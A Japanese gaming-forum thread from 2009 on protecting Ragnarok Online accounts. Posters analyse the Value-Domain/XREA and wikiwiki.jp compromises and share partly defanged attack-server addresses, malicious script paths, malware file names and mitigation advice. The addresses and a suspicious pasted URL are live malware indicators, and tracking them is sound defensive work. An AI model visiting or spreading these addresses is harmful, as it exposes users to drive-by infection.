すみません、晒すのは場所がわからなくなってしまいましたorz <> (○口○*)さん<>sage<>09/07/01 19:08 ID:Lqp6nmyT0<> ID変えたらそのIDわかんなくなったっつーことで
もうスレ違いなので他でどうぞ。 <> (○口○*)さん<><>09/07/03 01:06 ID:aj5Z/rkg0<> Vistaでウイルスバスターを使ってるんですが
最近ROを起動すると右下に「不審な変更を拒否しました。」と出ます。
確か今週のメンテからだったと思うのですがこれは何でしょうか・・ <> (○口○*)さん<>sage<>09/07/03 02:21 ID:Od1iZKJb0<> >>221
メンテでexeが書き換わってるから、通信許可を出さないと、FW機能が問い合わせてくるのは正常動作。 <> sage<><>09/07/04 14:31 ID:M7uJmg1H0<> ひとつ質問させてください。
板で推奨されているPG2を導入してみた訳ですが、
この状態で仮に危険なアドレスを踏んだとしても
PG2が送信をブロックしてくれるから安全という認識でいいのでしょうか。 <> (○口○*)さん<>sage<>09/07/04 14:32 ID:M7uJmg1H0<> sageミスりました、すいません。 <> (○口○*)さん<>sage<>09/07/04 14:50 ID:iYB4+kjt0<> 適切なブロック範囲が設定されており、アカウントハック業者の受信用サーバーが、運良くブロック範囲に入っていれば
送信がブロックされることになります。ブロックするIP範囲の指定を適切に行なっていない場合は、ブロックできません。

中国以外に送信する可能性もありますので、完璧ではありませんが、リスクを減らすことができます。
セキュリティには完璧はありません。どれだけリスクを減らせるかということになります。 <> (○口○*)さん<>sage<>09/07/04 14:51 ID:kz4xXnzT0<> PG2がどういうものか分からないで使うのは危ないんじゃない?
(枯渇が危惧されているが)IPの割り当ては現在も進んでいるから、
自分でメンテナンスできないと意味ないと思うし。 <> (○口○*)さん<>sage<>09/07/04 16:30 ID:M7uJmg1H0<> >>225-226
レス有り難うございます。
一応ROクラック対策まとめサイト及び、リネージュ資料室様やBSテンプレなど
一通り拝見した上で、危険ドメインリストの更新なども行っております。
が、所謂アンチウィルスソフトの用に運用する上での効果といいますか、
PG2がどのような物なのかがイマイチ解らなかったので質問させて頂きました。
相応の運用をすればリスク軽減が期待できるもののようですので、
運用方法などを今一度学びながら有効活用できるようにしていきたいと思います。

本日ROと無関係のサイトを閲覧中に遮断の反応を示したので、
何事かと思ったのですが、お二方の返答のおかげでその理由が解りました。
返信有り難うございました。 <> (○口○*)さん<>sage<>09/07/04 17:46 ID:rsH87Emh0<> PG2のリストに関しては、新規に取得されたドメインの追加は精力的に行われているけど、失効したドメインの
メンテナンスについては少々疎かになっている部分がある。
その為、レジストラがドメインパーキングとして保持していた場合に、通常のサービスで運用されているIPと
一致してしまい、結果的にPG2が誤検知を起こすこともままある。
この場合は、該当IPの諸元、要は何処のNICで管理されているか、などの方法によって問題の有無を見分ける必要が出てくる。

それ以外だと、>>225で触れられているようなケース。国内に設置された中継サーバや、botnetに組み入れられているゾンビPCなどを
経由して送信される可能性もあるので、PG2だけを盲信するのも禁物。 <> (○口○*)さん<>sage<>09/07/05 10:21 ID:ccw3wIjM0<> >>221と同じ症状で困っていたんですが問題なさそうで助かりました。

反応しているのはGameGuard.desとGameGuardフォルダのGameMon.desなので大丈夫だろうとは思っていましたが結局気になっていろいろ調べることに。

しかし起動自体はちゃんと成功するし、警告が出るのがパッチが当たる所ではなくRO起動後なのでいまだに心配なのですが>>221と全く同じと考えて良いのでしょうか? <> (○口○*)さん<>sage<>09/07/05 10:34 ID:docmL5Od0<> ドライバーの生成は、パッチクライアントでは発生しない。
パッチクライアントからRagexe.exeが起動された時点で行われるので、警告の出るタイミングはOK。

>しかし起動自体はちゃんと成功するし

セキュリティソフト側がブロックに失敗するのはダメですな。ダメなのはそのセキュリティソフト。(苦笑) <> (○口○*)さん<>sage<>09/07/05 10:41 ID:docmL5Od0<> あ、警告が出たときに許可すれば、起動に成功というなら、セキュリティソフトも問題無いです。
許可を出さないのに起動に成功するならダメなソフトというだけで。 <> (○口○*)さん<>sage<>09/07/05 10:47 ID:ccw3wIjM0<> 素早い返信ありがとうございます。

セキュリティソフトの問題ですか。そのようなメッセージが出て起動ができない!という例は聞いた事があったのでこれは別の原因なのかなぁと勘繰ってしまいました。

それに以前は更新の度にこんな警告は出なかったので一人焦っていました。ここもセキュリティソフトの更新のせいなのでしょうか?

例外設定をいじってGameGuard.desとGameGuardフォルダのGameMon.desを例外設定すると警告は出なくなりました。ありがとうございましたー。 <> (○口○*)さん<><>09/07/05 18:12 ID:lEesniIU0<> FEZのwikiでトロイが仕掛けられたらしい ROもきーつけろよ <> (○口○*)さん<>sage<>09/07/05 18:51 ID:TMiqQD9Y0<> >>233
リンクでいいから詳細plz <> (○口○*)さん<>sage<>09/07/05 19:48 ID:4cSXfu5P0<> >>234
FEZ公式(雑談)掲示板で話題になってるからそこのアドレスはっとく
ttp://www.fezero.jp/com_talkview.aspx?page=0&seq=16977

WIKI自体は今は落ちてるはず。ソースチェッカーでみても反応無し <> (○口○*)さん<>sage<>09/07/06 08:32 ID:ZWxrNvTT0<> Wikiからとんだリンク先ではなくWiki自体から感染したってことなのかな?
チラッと漁ったが確定情報はなし。
大抵の感染者ってそういう方面に疎いから(だから罹ったとも言うのだろうけども)、
経路がどこって特定するのに結構手間がかかるんだよなー。

WikiからってならWikiプログラムかその置かれたサーバに脆弱性があるということだから
RO界隈ではやったアカハクアドレス書き込まれるのとは次元が異なり、かつ、危険度も
高いということになる。
真相の究明が待たれるところだねぇ。 <> (○口○*)さん<>sage<>09/07/06 10:35 ID:GGGQ8LYn0<> アラド戦記のwikiにも、トロイが仕組まれてる(?)模様

従来の手口はWikiに中華アドレス貼られて、そこを閲覧した人が感染するものと思ってたのですが…
手口がはっきりしてないから怖いですねえ <> (○口○*)さん<>sage<>09/07/06 10:39 ID:s4iycyZr0<> PRIUSのWikiにも同じ話題があったが、Wikiそのものの改変ではなく、
Wikiに出ている広告って話もある <> (○口○*)さん<>sage<>09/07/06 16:42 ID:DO+Iu9dF0<> VALUE-DOMAINのログインページに不審なJavaScriptを見つけたので晒し

www■value-domain■com/login■php
 1856317799:888/s■js
  0x6EA52967:888/dir/show■php
   110■165■41■103:888/dir/go■jpg
    以降不明

1行目のURLをhttpsでアクセスするとセキュリティ警告が出る(不審JavaScriptがSSLでないため)
2〜4行目は同じサーバで、すべて「110■165■41■103」。
このIPは「hellh■net」としてPG2定義ファイルに既出。 <> (○口○*)さん<>sage<>09/07/06 16:58 ID:AARwqNFI0<> 110.165.32.0-110.165.63.255

1044 名前:(*‘ω‘ *)オンライン[sage] 投稿日:2009/07/05(日) 04:44:17 ID:Zhjy2I3Q0
1856317799=0x6EA52967=110.165.41.0

118 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/05(日) 13:26:27
>>117
いや、誤情報じゃないね
ttp://pc11.2ch.net/test/read.cgi/sec/1242606390/703
703 名前:61[sage] 投稿日:2009/06/27(土) 09:45:04
>>699
AVIRA9 7.01.04.144
 fk.pdf - HTML/Shellcode.Gen
Kaspersky 2009/06/27 8:38:00
 fk.pdf -

Kaspersky提出済み。


fk.pdfの中身みるともろだわ

136 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/06(月) 08:26:46
とりあえず現状
ttp://www.virustotal.com/jp/analisis/247f523d4adf0eea2170ef14daaa38e5e3d6dc93acbc4d4e622c609be579b598-1246421031 <> (○口○*)さん<>sage<>09/07/06 17:05 ID:ngeYO/2g0<> VALUE-DOMAIN ≒ XREA
ま た デ ジ ロ ッ ク か

989 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/07/06(月) 04:47:23 0
http://www■value-domain■com/login■php
午前4時30分ごろから、上のログインページにログインしようとすると、
ActiveXのインストールが実行しようとされます。

実行元を調べると、以下だった↓
ttp://110■165■41■103:888/dir/m■htm
そして、そのIPを調べると・・・
http://safeweb.norton.com/report/show?url=110.165.41.103
↑ウイルスだーー!クラックされたか?!

990 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/07/06(月) 04:49:14 0
あと、無料ネームサーバーの件だけど、最近IPが変わってるみたい。
ns1■value-domain■comと、
ns3■value-domain■comが、
以前のIPから別のものに変わってる。
でもns2は同じままだ。 <> (○口○*)さん<>sage<>09/07/06 17:31 ID:vMTAY3AW0<> >>239
go.jpgというファイルの中身はJavaScriptで「Microsoft DirectShow MPEG2TuneRequest
Stack Overflow Exploit」の実証コードを書き換えたものっぽい。たぶん0day。

go.jpgをVirusTotalにかけた結果
ttp://www.virustotal.com/jp/analisis/198b2afe754085b21a488c4fe1965f82e375d7d0ac7a6e66a9ea2a4fd29c20e8-1246868592 <> (○口○*)さん<>sage<>09/07/06 17:35 ID:yEh2ssdb0<> >>242
宜しく願う

【鑑定目的禁止】検出可否報告スレ11
ttp://pc11.2ch.net/test/read.cgi/sec/1242606390/ <> (○口○*)さん<>sage<>09/07/06 18:17 ID:vMTAY3AW0<> >>243
行ってきました。

Symantecの中の人がblogで関連記事を書いてた。
ttp://www.symantec.com/connect/blogs/let-celebration-come-end
これによるとVistaは大丈夫。XP+IE6/IE7はアウト。IE8はセーフらしい。 <> (○口○*)さん<>sage<>09/07/06 23:14 ID:TACbVzpv0<> またVALUE-DOMAINかよw <> (○口○*)さん<>sage<>09/07/07 05:37 ID:ep/xTnAz0<> アドバイザリ出ました。
ttp://www.microsoft.com/japan/technet/security/advisory/972890.mspx
レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
ttp://support.microsoft.com/kb/972890/ <> (○口○*)さん<>sage<>09/07/07 08:04 ID:fUN5lr7C0<> >>244
乙 スレ番間違って種スマソ <> (○口○*)さん<>sage<>09/07/07 22:24 ID:UmLerPa40<> VALUE DOMAINに関しては、こちらで話題になってます。
今のところどこまで被害があったのか謎です。

VALUE DOMAINってどうよ? part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/ <> (○口○*)さん<>sage<>09/07/07 23:03 ID:I8uH1XCo0<> ちょっとまだ情報不足だけど実害が出たかもしれない人があらわれた
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/304 <> (○口○*)さん<>sage<>09/07/07 23:08 ID:I8uH1XCo0<> ネタかもしんない
ごめんなさい
落ち着いてからのほうがよかったね <> (○口○*)さん<>sage<>09/07/07 23:26 ID:AJUuBZvx0<> ここで実況してもどうしようもないで、w <> (○口○*)さん<>sage<>09/07/07 23:28 ID:UmLerPa40<> >>249-250
和んだよ (゚ε゚)キニシナイ!! <> (○口○*)さん<>sage<>09/07/08 12:30 ID:/n4SGr0/0<> 試用版でカスペ2009を使ってるけど
ROを起動したときに警告がきて、
許可しても毎回聞かれるのな・・・(しかも二つ
慣れるまで時間が掛かりそうだw <> (○口○*)さん<>sage<>09/07/08 12:39 ID:q9m1TY350<> 最初から除外設定しとけよ <> (○口○*)さん<>sage<>09/07/08 14:58 ID:C1ZODNZT0<> 4gamerankingの中身が>>246の攻撃コードにかわってたよー
いままで古い脆弱性だったけどこれでまた被害が増えるかもしれない

確認用にSCOのリンク貼っときます
ttp://so.7walker.net/?http%3A%2F%2Fwww.4gameranking.com%2Fxin%2F&dele=1 <> (○口○*)さん<>sage<>09/07/08 16:10 ID:J8yPXJk50<> xreaのアクセスアナライザにもVALUE DOMAINと同様の攻撃コードが仕込まれました
同じ会社が管理する。VALUE DOMAIN、XREA、CORESERVER利用者はご注意ください <> (○口○*)さん<>sage<>09/07/08 16:37 ID:C1ZODNZT0<> もろに仕込まれてるね
こういうことらしい
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/551
551 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/08(水) 16:24:48 0
>>539
ax.xrea.comは2台だな。
219.101.229.188 ←やられてる
219.101.229.189 ←やられてない <> (○口○*)さん<>sage<>09/07/08 20:09 ID:9aoOp4i50<> >>255
確認しました。
いつもの /xin/xia.exe で、7日夕方更新です。
検知できなかったソースネクスト(K7)とMicrosoftに発射します。
VT ttp://www.virustotal.com/analisis/4b0686144782d0f66dfccb43d3d334f8566776eb71eae0eb47daca77b682e387-1247051327 <> (○口○*)さん<>sage<>09/07/08 20:18 ID:q9m1TY350<> >>258
他も一通り提出済みです。 <> (○口○*)さん<>sage<>09/07/08 22:08 ID:yFTyE79F0<> ValueDomainがやられてるって事は、xrea使ってるWikiとかも危険なのかな? <> (○口○*)さん<>sage<>09/07/08 22:28 ID:Vvna4wby0<> どこが危険かなんて誰にも全ては分からないし、安全な場所なんて誰も保証できない <> (○口○*)さん<>sage<>09/07/08 22:29 ID:PNAQCetm0<> >>260
いまのところはっきりとした被害報告はないけど
潜伏期間かもしれないからどうなるかわからんってところ

とはいえどんな鯖だっていつ汚染されるかわからないし
閲覧側としては現時点ではいつも通りでいいと思うよ

もちろん日頃から対策してろという意味も含めてね <> (○口○*)さん<>sage<>09/07/08 22:38 ID:yFTyE79F0<> >261
一般論ではそうだと思うし、言ってる意味も良く分かるんだが
セキュ板のスレ読んでも状況が良く分からなかったんだ。

1.ValueDomainのログイン画面がクラックされてた
 1-1.そのタイミングでログインした管理人が被害に遭った可能性がある
 1-2.その管理人が感染した場合、その人が管理してるサイトが
    改竄された(される)可能性がある

2.アクセスログを管理してる鯖がクラックされてたらしい?
 2-1.改竄された不正なJavaScriptのファイルがあるので、そのアクセス
    解析を利用してるサイトが汚染した可能性がある

3.罠JavaScriptがアクセスするのは香港のサイトだった

4.同じ0Day攻撃でマビノギ系のWikiが改竄されて、アカハックの
 被害が発生してる

自分が把握した現状認識はこうなんだが、これで合ってる? <> (○口○*)さん<>sage<>09/07/08 23:27 ID:kv2xwLq/0<> >>263
> 1.ValueDomainのログイン画面がクラックされてた
>  1-1.そのタイミングでログインした管理人が被害に遭った可能性がある
>  1-2.その管理人が感染した場合、その人が管理してるサイトが…
1.と1-1は正しい。1-2は分からない。信の置けるレスは当該スレには見当たらない。
そもそもウイルスが何の情報を盗むのか解析されていない。GENOウイルスと
同じかもしれないし、MMOアカウントかもしれない。

> 2.アクセスログを管理してる鯖がクラックされてたらしい?
>  2-1.改竄された不正なJavaScriptのファイルがあるので、そのアクセス…
2は否。「アクセス解析サービス」のログインサーバが改竄された。ほら、タグを貼るだけで解析を
してくれるって言うアレ。
2-1は分からない。各々のサイトに張るアク解タグから不正なJavaScriptを呼び出すかは
検証例が無い。

> 3.罠JavaScriptがアクセスするのは香港のサイトだった
真。

> 4.同じ0Day攻撃でマビノギ系のWikiが改竄されて、アカハックの…
正確にはwikiサービスを提供するwikiwiki.jpがやられたらしいがこれは情報を追って
いないので分からない。ただ、マビノギのWikiはwikiwiki.jpから専用サーバを
振り分けられていた気がする。 <> (○口○*)さん<>sage<>09/07/08 23:39 ID:9aoOp4i50<> WIKIWIKI.jpについてはセキュmemoに魚拓送ってあります。
まぁVALUEDOMAINのと同じ。 <> (○口○*)さん<>sage<>09/07/08 23:40 ID:yFTyE79F0<> >264
解説有り難う。
結構読み違えてたな……

しかし結局は、続報待ちつつ(追いかけつつ)
>262の言うように普段通りにするしかなさそうだね。 <> (○口○*)さん<>sage<>09/07/08 23:44 ID:letHNo2y0<> 普段通りというか、これからPC環境には厳しい季節になる訳で、万が一に備えた環境のバックアップを取るのも良い。
出来れば夜の涼しいうちに。 <> (○口○*)さん<>sage<>09/07/09 00:18 ID:XoP7dgDZ0<> Webブラウズを仮想環境に押し込めるのが、もっとも手っ取り早い方法だな。
って思う <> (○口○*)さん<>sage<>09/07/09 01:24 ID:hOxJI3Y80<> これと>>255の更新が早かったとこを見ると
偶然見つけちゃったのがいつものあの子たちだったってことなのかな
http://www3.atword.jp/gnome/2009/07/08/one-day-after-the-ie-zero-day-attacked/

どうも攻撃後に落ちてくるファイルもそっち系みたいだし <> (○口○*)さん<>sage<>09/07/09 04:31 ID:EiarroTy0<> >>267
web製作板のアク解スレは当然のことながら、VDスレですら頭の痛くなるような
レベルの話をしているんで流し読み程度で済ませておくほうが吉かも。なんつーか、
ちょっと知識がある程度の人たちが頓珍漢なやり取りをしている感じだから。
元々あの辺りの板は住人の質があんまり良くない。レン鯖板はID出ないからなおのこと。
セキュリティ板ですらgdgdだからなあ。声の大きい人が目立つのはどこでも一緒のようで。

>>268
そういう点ではChromeは優れているらしいけど、自分はfxだから分からないや。
色々マイナス点が気になるので使うことはなさそうだけど。
仮想PC環境のLinux上でブラウジングできたら大抵のマルウェアは無効なんだろうけど、
そもそもそういうのを導入できるスキルの有る人ならWin環境でも十分自衛できるだろうしなあ。 <> (○口○*)さん<>sage<>09/07/09 13:07 ID:BkN1J8Nz0<> 1856317799=0x6EA52967、FC2ブログにも来たようだ。
ttp://dubai.2ch.net/test/read.cgi/ogame/1245761603/560-564
サーバ丸ごとというよりはパス抜かれた特定のブログに
勝手にログインされて改竄されたっぽいけど。 <> (○口○*)さん<>sage<>09/07/09 17:11 ID:BkN1J8Nz0<> 改竄に関するお知らせとお詫び
ttp://wikiwiki.jp/?Notice%2F2009-07-09 <> (○口○*)さん<>sage<>09/07/09 17:36 ID:RR8tMusb0<> 【      気付いた日時          】17:00頃
【不審なアドレスのクリックの有無 】ttp://blog-imgs-27-origin.fc2.com/a/n/c/anchor17/anc58_vip20ch43293.jpg
【他人にID/Passを教えた事の有無】No
【他人が貴方のPCを使う可能性の有無】No
【    ツールの使用の有無      】No
【  ネットカフェの利用の有無    】No
【     OS    】Xp【使用ブラウザ 】 (InternetExplorerなど、バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】avast
【その他のSecurty対策 】Spybot S&D
【 ウイルススキャン結果】特になし
【スレログやテンプレを読んだか】今から読みます
【hostsファイルの変更】無
【PeerGuardian2の導入】無
【説明】画像が表示されずリダイレクトされまくってるので気になりました <> (○口○*)さん<>sage<>09/07/09 17:39 ID:CmMn9VKz0<> ふ〜ん。鑑定スレ行けば〜。


と、冷たい対応で済まないが、ここに相談するような事例とは思えない。 <> (○口○*)さん<>sage<>09/07/09 17:59 ID:yDAZSQ5x0<> >>272
>WIKIの機能の一部を提供している外部サーバにて不正なアクセスがあり、スクリプトが改竄され
>2009年7月08日(水) 外部サーバのホスティング業者のログインページが改竄されているとの情報を入手したが、発表はない

時系列に疑問は残るけど、「実害」の疑いが強すぎる・・・ <> (○口○*)さん<>sage<>09/07/09 18:00 ID:l7IQjKrc0<> そもそもその不審なアドレスを■にしないで書き込んでる時点でダメだよな

自分がキケンだとおもってるんならここいけ
LiveRO板削除依頼スレッド4
http://zaurak.mmobbs.com/test/read.cgi/manage/1225802854/ <> (○口○*)さん<>sage<>09/07/09 18:05 ID:rrH8Puiv0<> よく見ると春画のようだが、
こういう画像は削除対象になるんだろうか <> (○口○*)さん<>sage<>09/07/09 21:29 ID:ryC33iAc0<> Live2chだとttpでもURLと認識して画像まで読み込むんだよ。
だからってわけじゃないが、ピリオドはちゃんと変えてくれ。 <> (○口○*)さん<>sage<>09/07/10 02:24 ID:590O/eTF0<> 狩場情報ひっそり(xrea使用)、安全性のためメンテナンスに

> サーバをレンタルしているところが改ざんをうけたようなので、
> 安全のためにいったんメンテ扱いにします。
> 安全性が確認されるか、別のレンタルサーバが見つかるまでお待ちを。

同じサイトが管理する、「じゃぁ俺がキャラ作る」の纏めサイトも
現在閲覧することはできません

> コストと機能のトレードオフなんだけど、さてどうしたものか。
> PHP (not CGI), PostgreSQL (MySQL), perl, cron,
> 可能なら ssh が使えて年額1万円程度までなら出せる。
> 見つかったのはハッスルサーバーくらいでしょうか。。。
> いいところあれば教えてください。 <> (○口○*)さん<>sage<>09/07/10 02:53 ID:UM043nv40<> モジュールphpが何気に敷居高いな <> (○口○*)さん<>sage<>09/07/10 04:25 ID:neckHYIC0<> PHPがなければ、余裕で見つかりそうだな。 <> (○口○*)さん<>sage<>09/07/10 07:57 ID:ZSvA9itM0<> blogやwebにアクセスアナライザー使ってる人は確認したほうがいいね

リネージュ資料室
ttp://lineage.paix.jp/guide/security/virus-site.html#XREAAX

セキュリティホールMEMO
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090709_tuiki <> (○口○*)さん<>sage<>09/07/10 12:14 ID:eE4Y1tBE0<> 韓国で今度は一般家庭のPCも次々と壊れ始めたらしいな

ウィルスによるものだとすれば決して対岸の火事ではないよな… <> (○口○*)さん<>sage<>09/07/10 12:36 ID:ikwtQDPP0<> 広義のネットゲームということで、人狼SNSもここ数日休止状態。
ttp://wolfsbane.jp/
>以上の情報を受け、この件について調査した結果、人狼SNSでは被害を確認できませんでしたが、ドメインサービスの
>ウェブサイトが改竄されたという事実や、ドメインサービスのグループサイトがいまだ改竄されたままであるという現状から、
>サービス会社の運営体制に不安がある状態となっています。よって、万一の事態に備え、ある程度安全であるという確信が
>持てるまで、人狼SNSのサービスを一時停止とさせていただきます。

一種のブラウザゲームとも言えるジャンルだけど、プレイヤー側は一般のMMO/MOやFPS/TPSプレイヤーと比較して
セキュリティ対策に明るくない傾向にあり、むしろこういったサイトの方が最終的な被害が拡大しやすいのかもね。 <> (○口○*)さん<>sage<>09/07/10 13:17 ID:zlMDFq6S0<> というかMMOプレーヤ(の一部)が詳しくならざるを得なかったという笑えない状況ですな <> (○口○*)さん<>sage<>09/07/10 13:31 ID:590O/eTF0<> NetSecurityより

大手ブログサイトでXSS脆弱性
ttps://www.netsecurity.ne.jp/3_13598.html

情報を追ってみるとFC2らしいです <> (○口○*)さん<>sage<>09/07/10 14:08 ID:y3NF6USp0<> >>283
あちらの国はIE+ActiveXに依存しまくりだからね
以前から問題になっていて何が起こってもおかしくない <> (○口○*)さん<>sage<>09/07/10 15:18 ID:zlMDFq6S0<> VALUEDOMAIN・XREA・WIKIWIKIの騒動、
敵のサーバ(110.165.41.103)が繋がらなくなったので
とりあえずこれがあったら感染というファイル名をコピペしておきますね。
windows\system32 の中に
carrsv.dll
diskcheck.exe
flashaegh.dll
mnpse.dll
ntst.dll <> (○口○*)さん<>sage<>09/07/10 20:08 ID:pfTiDxFT0<> >>286
fc2っていえば、0サイズフレームを使った不正コード付きblog量産の頃をオモイダスヨ。 <> (○口○*)さん<>sage<>09/07/11 10:10 ID:FogkaPy00<> ソースチェッカーオンラインがXREA系のs99.coreserver.jpなんだよな
何も影響がなければ良いんだが <> (○口○*)さん<>sage<>09/07/11 19:32 ID:/ayd0JzK0<> >>286の件と関係あるかわからないが、今FC2Blogの管理画面にアクセスすると、
www■hellh■netに誘導される(PG2がブロックして気づいた)
管理画面だけで、Blogそのものに攻撃コードは無かった

とりあえずサポートに連絡してくる <> (○口○*)さん<>sage<>09/07/11 20:05 ID:Gt5MF57I0<> 土日にやられるときついな <> (○口○*)さん<>sage<>09/07/11 20:14 ID:/ayd0JzK0<> FC2で画像広告が出るページが軒並みダメだ

あと、FC2のサポートフォームってどこ?
サポートBlogしか見当たらない <> (○口○*)さん<>sage<>09/07/11 20:28 ID:AhwqYi7l0<> TB・コメントスパム・不適切ブログ報告フォーム
ttps://form1ssl.fc2.com/form/?id=49541

FC2掲示板迷惑投稿報告フォーム
ttps://form1ssl.fc2.com/form/?id=113038 <> (○口○*)さん<>sage<>09/07/12 00:21 ID:YGHTuWvj0<> FC2ももうダメか <> (○口○*)さん<>sage<>09/07/12 00:39 ID:lU/dZWs40<> まて、そんな言い方したら、FC2がダメじゃなかった時期があったように聞こえるじゃないか。 <> (○口○*)さん<>sage<>09/07/12 00:40 ID:jlKCv/YD0<> コア鯖、リュックのねーちゃんがでてきて吹いたw <> (○口○*)さん<>sage<>09/07/12 15:14 ID:H3mccFx80<> >>291
元のhellhのIPには今は繋がらない。
一時撤退と思われる。んで
今のhellhのIPはFC2になっている。
たぶんPG2使いへの嫌がらせ。 <> 291<>sage<>09/07/12 16:57 ID:d20+AAcq0<> >>298
ということは、FC2の画像広告サーバと、
hellhのIPが同じになっているために、PG2が反応した・・・と

ありがとう
サポートにも連絡しておくよ <> (○口○*)さん<>sage<>09/07/13 10:30 ID:r8Sxi4Gl0<> 結局fc2は問題なかったの? <> 291<>sage<>09/07/13 21:04 ID:6CSSRz4D0<> >>300
自分が言い出した問題なので、後始末しておく
結論から言えば、「FC2に問題はない」

今回PG2がhellhとしてブロックしたIPは208.71.106.124
このIPは正引き逆引きともにfc2.com
で、今はhellhのIPも208.71.106.124として登録されている

ここからはPG2の原理がよくわかってないので推測だけども、
PG2の遮断IPリストを作るとき、hellhのIPが208.71.106.124だったために、
PG2のリストにhellh=208.71.106.124として登録されてしまったと思われる

当然、FC2が持つIPはこれだけではなく、Blog管理画面のサーバは別のIPだったが、
管理画面に出る広告の管理サーバがこのIPだったので、
部分的にブロックされたということ <> (○口○*)さん<>sage<>09/07/14 06:02 ID:AMkKMZFC0<> Office Webコンポーネントに脆弱性
ttp://www.microsoft.com/japan/technet/security/advisory/973472.mspx
既に攻撃が行われている。パッチはまだない。
↓のFix itを実行しましょう。
ttp://support.microsoft.com/kb/973472/ <> (○口○*)さん<>sage<>09/07/14 14:13 ID:wi6gdL1h0<> デジロックウィルスをばら撒くサイトは、気をつけろ〜 <> (○口○*)さん<>age<>09/07/15 03:51 ID:OWSb0Rtc0<> MS、7月の月例パッチはWindows関連の“緊急”3件を含む計6件
ttp://internet.watch.impress.co.jp/docs/news/20090710_301277.html

WindowsUpdateをお忘れなく。 <> (○口○*)さん<>sage<>09/07/15 15:50 ID:nEda31Rx0<> 板違いだったらすいません。

昨日、仕事でネカフェをつかったときに、
時間が余ったのでトレンドマイクロのオンラインチェックを走らせたところ
ウィルス1個(ハッキングツールと表示されていました)とスパイウェア1個、
セキュリティホールが23個と表示されていました。

ウィルスとスパイウェアは一応駆除ができましたが、
マイクロソフトアップデートは使用者権限がないから掛けられなかったので
このまま放置されてるのかなぁ、とちょっと不安になりました。


今までネカフェでRoをやったことはないのですが、
もしネカフェでゲームをするとしたら、
どういう事前チェックとかかけたらいいんでしょうか? <> (○口○*)さん<>sage<>09/07/15 16:14 ID:OWSb0Rtc0<> 1.携帯などでパスワード変更(ネカフェのPCを信用しない)
2.デスクトップになにかファイルを作ってからPCを再起動させ、ファイルが残っていないことを確認する。 ※※※ 必須 ※※※
  (残っている場合、別のPCに変えてもらう)
3.USBメモリが挿さってないか確認
4.プレイ前に、信頼できるベンダーのオンラインスキャンをかける
5.スキャンで危険なファイルが発見された場合、店員に報告し、他のPCに変えてもらう。
  ・危険ファイルが見つかった時に限っては、スキャンしていた時間分はサービスして貰えるよう交渉してもいいかも?
  ・危険ファイルがない時にそれやったらクレーマーなのでやらないように。
  ・スキャンで時間ロスする分は、安全の為の保険料だと思って諦める。
  ・プレイ後即安全な環境からパス変更するので、端末に向かっている間のものは盗まれてもいいと思ってプレイするのは
   自己責任でご自由に。
  ・どうしても時間短縮したいなら、スキャンとプレイを並行して行ってもいいが、危険ファイルが発見されたら、
   パスが盗まれた前提で行動する。
6.プレイ後、ROをロックしてから帰宅すること
7.ネカフェを出たら、携帯などの安全な環境からパスワードを変更しておく <> (○口○*)さん<>sage<>09/07/15 16:15 ID:SSAUjA/60<> >>305
スレチってわけではないけど、どちらかといえばこっち。

公認ネットカフェ関連スレッド7【ネカフェ】
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1243353526/ <> (○口○*)さん<>sage<>09/07/15 16:23 ID:OWSb0Rtc0<> >>307
ネカフェスレでは、こっちの情報も参考にってことになってるね。

ネカフェスレのテンプレはこうなってる

http://gemma.mmobbs.com/test/read.cgi/ragnarok/1243353526/2
・アカウントハッキングに注意。
 ネカフェ利用直前と直後に、携帯からパスワードの変更をしましょう。
 携帯ブラウザが使えない場合は、出発前と帰宅後に
 自宅等の安全な環境からパスワードの変更を必ずしましょう。

 プレー前のウイルススキャンや怪しいUSBメモリが刺さってないかのチェック
 離席時はキーボードのロック、USBディスクは使用不可にするなど、
 自衛を心掛けてください。アカウントハック対策スレの情報も参考になります。
−−−
スキャンしないでパス盗まれても、ログイン中は不正アクセス有ってもログイン合戦になってわかるし
出て即携帯からパス変更すれば、スキャンしないで使うのもありといえばありなんで、ネカフェスレの
テンプレ(スキャンはしない)でも問題ないっちゃ、問題ないんだよね。
(但し、メッセンジャーとかメールとかは…使わないほうがいい)

ただ、危険ファイルが存在して、再起動してもそいつが復活する状態になってるPCを使わせるネカフェは
チェックした方がいいね。

あと、周囲からパス入力するところをのぞき込まれたりしないようにも注意かな。
もっとがっちり固めたければ、PG2を入れて(再起動したら消えるが)まとめサイトのリストをブロック対象に
設定すれば安心かな。 <> 174<><>09/07/16 03:20 ID:W/MUSClP0<> 以前にも質問をしたのですが悩んで決めた結果マカフィーを使ってみようと思ったのですが
一応 マカフィーとROで検索して使ってる方のブログが1件ありまして見たところ相性微妙そうなのですが2008年のことだったので
現在はわからないのですがマカフィー使用してる方でROやってる方おります?

だめそうだったらノートン先生でも買おうと思ってます <> (○口○*)さん<>sage<>09/07/16 03:24 ID:VuanqjgW0<> マカフィーやノートン使う位なら、カスペにしとけと思うけどなぁ。ネトゲやるPCでは。 <> (○口○*)さん<>sage<>09/07/16 03:31 ID:HyGe/IFS0<> Fx3.5のJITコンパイラに脆弱性
http://journal.mycom.co.jp/news/2009/07/15/059/
>Tracemonkeyを無効にするには、アドレスバーにabout:configと入力して設定ページを開き、 >javascript.options.jit.contentの値をfalseへ変更すればいい。Firefoxをセーフモードで実行
>することでも同じ効果がある。

対処法はあるものの、JavaScriptのパフォーマンスが落ちる。
修正された新しいバージョンがリリースされたら、設定値をtrueに戻すこと。 <> (○口○*)さん<>sage<>09/07/16 11:34 ID:nVs8a3Dg0<> >>310
>>174
>カスペは最新版がだめっぽいのでカスペ以外で何かありますでしょうか?
と書いてあるから、本人的には除外のつもりじゃないのかな。

カスペと相性の悪いソフトを使ってて、そのソフトが重要なのだろう。
ROとの相性のことを言ってるのなら何言ってるんだって感じだが。 <> 305<>sage<>09/07/16 20:31 ID:E0sPb5TT0<> >>306>>307>>308
アドバイスありがとうございます。
